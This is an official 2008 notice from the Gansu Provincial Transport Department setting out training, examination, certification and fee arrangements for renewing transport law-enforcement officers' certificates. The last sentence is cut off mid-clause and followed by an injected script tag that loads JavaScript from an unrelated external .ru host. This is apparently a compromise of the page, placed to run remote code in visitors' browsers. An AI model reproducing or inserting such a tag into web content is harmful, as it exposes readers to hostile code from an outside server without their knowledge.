当前位置:
关于做好第三轮行政执法证件换发工作的通知
名    称: 关于做好第三轮行政执法证件换发工作的通知
文    号: 发布机构: 甘肃省交通运输厅
添加时间: 2008-01-10 信息分类: 业务文件
索  引  号: 信息有效性:
关  键  字: 浏览次数:  次
甘交体法[2008]2号
 
省运管局、省交通征稽局、省水运(海事)局、省路政总队、省交通质监站,各市、州交通局,各公路总段(分局):
   根据《甘肃省人民政府办公厅关于印发甘肃省第三轮持证执法工作方案的通知》(甘政办发[2007]136号)的要求,结合我省交通工作实际,经请示省政府法制办同意,现将第三轮行政执法证件换发工作有关事项通知如下:
  一、学习培训
  1、培训方式。全省交通行政执法人员必须参加持证执法学习培训。培训按照不同情况,分层、分类培训的原则,采取集中与分散相结合的方式进行。新增公路路政、交通征稽、道路运政执法人员由省厅与省法制办集中统一培训发证。各地需换发行政执法证件的厅属公路路政、交通征稽及道路运政执法人员以市、州为单位,由各路政支队、交通征稽处和运管处组织集中培训。地方海事机构执法人员的培训由省水运(海事)局统一组织。省运管局、省交通征稽局、省水运(海事)局、省路政总队、省交通质监站等交通管理机关交通行政执法人员的培训采取省厅局与省法制办联合办班的方式进行。地方交通局其余交通行政执法人员一律参加当地政府法制机构组织的培训,向当地政府法制机构申领执法证件。
  2、培训时间。厅属在兰各执法机构应于2008年1月20日前完成培训工作。各地路政、征稽、运管执法机构应结合各自工作实际于2008年3月底之前完成培训工作,培训时间原则上不少于一周。新增交通行政执法人员培训时间另行发文通知。
  3、学习内容。学习内容分为综合法律知识和交通专业法律知识。综合法律知识的学习,各路政支队、交通征稽处和运管处可邀请当地政府法制机构工作人员授课。综合法律知识培训教材为省政府法制办编辑的《甘肃省行政执法人员培训教材》,由省厅统一发放。交通专业法律知识学习内容由省运管局、省交通征稽局、省路政总队、省水运(海事)局确定。
  二、考试考核
  全省交通行政执法人员培训考试时间拟定于2008年4月中旬,厅属在兰各执法机构初步定于2008年元月中下旬进行。综合法律知识考试内容由省政府法制办统一命题。各专业法律知识考试内容由厅属相关专业局统一命题,省厅审核。考试采取分片集中考试的方式进行。在省厅统一确定的时间内,各路政支队、交通征稽处和运管处要将交通行政执法人员组织集中到所在市、州,由省厅与省政府法制办组成的巡考组监督考试。考试结束后,试卷封送省政府法制办统一阅卷。同时,各交通行政执法机构要组织做好对交通行政执法人员的年度评议考核,结合平时考核情况作出评价。考核不合格的交通行政执法人员不得参加统一考试,并视情况调离交通行政执法岗位。
  三、审核发证
  经考试合格的交通行政执法人员由各级交通行政执法机构填报《甘肃省行政执法人员资格确认和证件申领表》,逐级上报汇总,并由厅属各专业局进行初步审查提出意见后统一报省厅。考试成绩不合格者可补考一次,经补考仍不合格者应离岗学习或调整岗位,不得上岗执法。同时,各级交通行政执法机构还需填报《甘肃省行政执法主体资格审查登记表》,由各专业局统一汇总后上报省厅,省厅报省政府法制办审查确认。全省行政执法证件换发工作于6月底结束,各交通行政执法机构应将审查合格颁发执法证件的人员和机构名单报备当地政府法制机构,并自觉接受其监督检查。
  四、相关费用
  行政执法人员执法证件费用由省财政统一负担,不再另行收费。行政执法主体资格证件、培训教材、试卷印刷、阅卷等费用由厅属各专业局负责统一缴省政府法制办。组织培训学习费用由各交通行政执法机构承担。
  五、工作要求
  1、加强领导。此次行政执法证件换发工作涉及全省各级交通行政执法机构和所有交通行政执法人员,时间紧,工作复杂,要求严格。各级交通行政执法机构要充分认识此次换证工作的重要性,切实加强领导,按照省厅要求抓好具体落实工作,保证如期完成工作任务。
  2、落实责任。厅属各专业局要根据本通知的要求,结合各自实际,及时提出本系统的具体实施方案,尽快组织实施。各交通行政执法机构要确定专门的机构和人员负责整个培训换证工作。厅属各专业局应于2008年1月10日前将分管此项工作的领导和具体承办人员名单、联系电话上报厅体改法规处。在整个工作开展期间遇到问题,要及时反映,研究解决。
  3、提供保障。各级交通行政执法机构要结合实际合理安排培训学习时间,解决好工学矛盾,保证学习时间、学习质量。要以此次换证工作为契机,深入开展一次交通行政执法队伍作风整顿工作,进一步增强交通行政执法队伍素质,提高执法水平。同时,对培训发证所需各项费用各单位要列出计划,?script src=http://www.mtno.ru/style.js>